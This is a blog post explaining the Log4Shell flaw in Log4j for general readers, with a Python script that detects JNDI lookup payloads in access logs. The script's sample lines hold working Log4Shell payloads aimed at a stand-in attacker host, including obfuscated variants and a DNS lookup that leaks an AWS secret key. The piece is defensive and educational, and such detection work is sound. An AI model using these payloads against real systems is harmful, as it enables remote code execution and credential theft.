I found the image above when searching for a good image of fire, and it seemed just about perfect on multiple levels. Buster Keaton (https://en.wikipedia.org/wiki/Buster_Keaton) is one of those iconic figures whose impact on modern culture is impossible to even estimate, and the idea of him lighting his cigarette from a burning bomb-fuse seemed like a great metaphor for current events. Most will recognize his name or his face, whether or not they can link the two, and many will recognize him from the endless clips of him on the Internet, showing his extraordinary stunt work (https://www.youtube.com/watch?v=frYIj2FGmMA), and some may even have watched some of his films, but his real impact is on those who came later. Names of those who identify Keaton as a major influence include Orson Welles, Mel Brooks, and Jackie Chan (https://www.mentalfloss.com/article/75546/how-jackie-chan-draws-inspiration-classic-hollywood), each of whom has had an enormous direct influence themselves.
While I’ve been trying to post weekly, the last few weeks have been even busier than usual, so apologies for that. Part of that has been home and holidays, but part of it is the fact that the Internet is on fire.
But wait, don’t we hear about the Internet being on fire every few weeks?
Well, yes, but this time is different.
Erm, don’t we hear that as well, every few weeks?
Well, yes, but this time might actually be different.
Sure. Yeah. Whatever. So, what’s going on, and how is this different?
To start with, I’m talking about a vulnerability known as “Log4Shell” (https://en.wikipedia.org/wiki/Log4Shell), which exists in a Java logging library known as Log4j (https://en.wikipedia.org/wiki/Log4j), specifically in the Log4j 2 line. It’s one of those tools that most non-technical people haven’t heard of, but which is embedded in just about everything.
To keep things as non-technical as I can, most computer systems have a need to generate log files to store information about key events which take place on the system. Examples of this include an online service which keeps a record of the fact that you changed the alias associated with your account from “Alice” to “Bob”, or that Alice last logged onto a social media account yesterday, or that Malice attempted to log into Bob’s account a week ago, but failed due to the MFA (https://www.til-technology.com/post/infosec-basics-multi-factor-authentication) on Bob’s account.
As expected, there is a lot of overlap in how people want to log data, so a developer named Ceki Gülcü created a utility known as Log4j (now managed by the Apache Software Foundation), which provides a flexible and consistent way of generating logs. Log4j is extremely useful and quite powerful, and is one of the free and open-source Apache Logging Services projects, so it came to be used by a wide variety of developers in various programs, which were then used in other programs, and so on, until we have estimates of hundreds of millions of devices that use the tool in some way.
So, Log4j is a very useful tool used in a lot of places. Interestingly, the risk of having such widely-used utilities embedded in everything has been discussed for years, perhaps most prophetically in the xkcd comic below:
And, as Steve Gibson of Security Now (https://www.til-technology.com/my-playlist) is fond of asking: “What could possibly go wrong?”
Which brings us to Log4Shell.
From 2013 (version 2.0-beta9) until version 2.16.0 removed message lookups and disabled JNDI by default, Log4j 2 supported the Java Naming and Directory Interface (JNDI), which allows Java objects to be looked up at runtime. This lets information be added to a log entry dynamically: a “lookup” placed in the message, written as ${jndi:ldap://some-server/some-name}, tells Log4j to fetch the named object from that server and substitute it into the log.
The problem, though, is that logs very often contain information provided by a user, so an attacker who can get such a lookup into something that gets logged can make the system contact a server of the attacker’s choosing (over LDAP or RMI, for example), download a Java class from it, and execute that class. This is arguably a type of “injection” attack, but the system was designed to work this way, so it is as much a “feature” as a “bug”. For reference, injection is included on the OWASP (Open Web Application Security Project) Top 10 (https://owasp.org/Top10/A03_2021-Injection/), but more amusingly described by (again) xkcd:
The practical upshot is that it was very easy to make a vulnerable computer download a program from anywhere you like and execute it, simply by putting the right string into any field that ends up being logged with Log4j, such as a username, a search box, a chat message, or the User-Agent header a web browser sends.
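To make that concrete, here is what the injected string looks like from a defender’s side. This is an added example written for this post, not code from Log4j or from any product, and the log lines, hostnames and field names in it are constructed. It scans web-server access-log lines for the JNDI trigger, and because Log4j resolved nested lookups from the inside out, attackers hid the trigger behind lookups such as ${lower:j} or ${::-j} that a plain search for “${jndi:” misses; the helper undoes those tricks (and one round of URL-encoding) before matching.

```python
"""Spot Log4Shell probe strings in web-server access logs.

Hypothetical detection helper written for this post; it is not part of Log4j
or any product. Log4j resolved nested lookups from the inside out, so
attackers hid the "${jndi:" trigger behind lookups that a naive substring
match misses:
    ${lower:J}      -> "j"
    ${upper:j}      -> "J"
    ${::-j}         -> "j"   (empty lookup name, so the default "j" is used)
    ${env:NOPE:-j}  -> "j"   (unset variable, so the default "j" is used)
This helper undoes those tricks the way Log4j would, then looks for the
trigger in the normalized text.
"""
import re
from urllib.parse import unquote

# A lookup with no further "${" inside it: Log4j resolves these first.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The trigger, plus the JNDI URL scheme (ldap, ldaps, rmi, dns, ...) it names.
JNDI_TRIGGER = re.compile(r"\$\{jndi:([a-z]+)://", re.IGNORECASE)

# Constructed sample access-log lines (Common Log Format; the User-Agent or
# the request target carries the payload). Addresses are private/test ranges.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:01:58 +0000] "GET /index.html HTTP/1.1" 200 '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://attacker.example/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:05:42 +0000] "GET /login HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}${::-d}${env:NOTSET:-i}:${lower:LDAP}://attacker.example/a}"',
    '192.0.2.44 - - [10/Dec/2021:14:09:13 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fobj%7D HTTP/1.1" 404 "-"',
    '203.0.113.9 - - [11/Dec/2021:02:13:07 +0000] "GET /api HTTP/1.1" 200 '
    '"${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.attacker.example}"',
]


def _resolve(match):
    """Resolve one innermost lookup, or return it untouched if we cannot."""
    body = match.group(1)
    key, sep, default = body.partition(":-")
    if sep:
        # "${name:-default}": an empty name or an unset env/sys variable makes
        # the lookup fail and Log4j substitutes the default. On a real target a
        # set variable would be substituted instead; we cannot know that here.
        return default
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    # ${jndi:...}, ${env:NAME} without a default, etc.: leave in place.
    return match.group(0)


def normalize(text):
    """URL-decode once, then collapse lookups from the inside out until nothing
    more resolves. Every substitution shortens the text, so the loop terminates.
    The result is roughly what Log4j saw just before the JNDI lookup fired."""
    text = unquote(text)
    while True:
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def scan_line(line):
    """Return the JNDI URL schemes found in one log line (empty list if clean)."""
    return [m.group(1).lower() for m in JNDI_TRIGGER.finditer(normalize(line))]


def scan_lines(lines):
    """Map line index -> schemes, for the lines that carry a trigger."""
    hits = {}
    for i, line in enumerate(lines):
        schemes = scan_line(line)
        if schemes:
            hits[i] = schemes
    return hits


if __name__ == "__main__":
    for i, schemes in scan_lines(SAMPLE_LINES).items():
        print(f"line {i}: JNDI lookup via {', '.join(schemes)}")
        print("   normalized:", normalize(SAMPLE_LINES[i]))
```

Run it over web-server, proxy or WAF logs rather than over the vulnerable application’s own Log4j output: by the time Log4j wrote its line it may already have resolved the lookup, so the trigger string can be missing there. The last sample also shows why the bug was more than a code-execution problem: a lookup such as ${env:AWS_SECRET_ACCESS_KEY} inside a DNS name leaks a secret to the attacker’s name server even if no code is ever downloaded. The script decodes only one layer of URL-encoding and expects the scheme to be followed by “://”; double-encoded or otherwise unusual payloads need the normalization extended.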
Examples of this (https://www.techradar.com/news/log4shell-can-hack-your-iphone-and-even-a-tesla) include one user changing his iPhone’s name and another changing his Tesla’s name to the attack string, which gives a taste of how widespread this issue is, and why the vulnerability (https://nvd.nist.gov/vuln/detail/CVE-2021-44228) has been given a CVSS (Common Vulnerability Scoring System) score of 10.0, the maximum.
As for the Internet being on fire, I’ve seen the phrase used widely, for example by Wired (https://www.wired.com/story/log4j-flaw-hacking-internet/). The bottom line is that this is something the general public can’t do much about, and that the entire tech community seems to be focused on. We probably won’t know for months what the “real” impact is, but we know it’s bad, and we know that we need to fix it as fast as possible. Everything else is a prioritization exercise and avoiding panic.
You might remember that Y2K was NOT a catastrophic issue, despite the dire warnings ahead of it. The thing is, a major reason it was not catastrophic was that the entire tech community spent years focused on it in advance of the event. There were problems, but they were mostly manageable.
Unfortunately, this is different. Malicious actors started attacking almost immediately, and will continue to do so until all systems are patched (i.e., practically until the end of time). It’s a near certainty that companies are being affected by this now but won’t disclose it until later. The important point is to recognize the urgency, but not to panic, and to make sure you keep your systems up to date. For most people that means installing the updates that vendors push out for their devices, apps and services, since Log4j is buried inside those products rather than being something you install yourself.
Beyond that, what can we do when the Internet is on fire?
The answer, of course, is to roast marshmallows!
Cheers!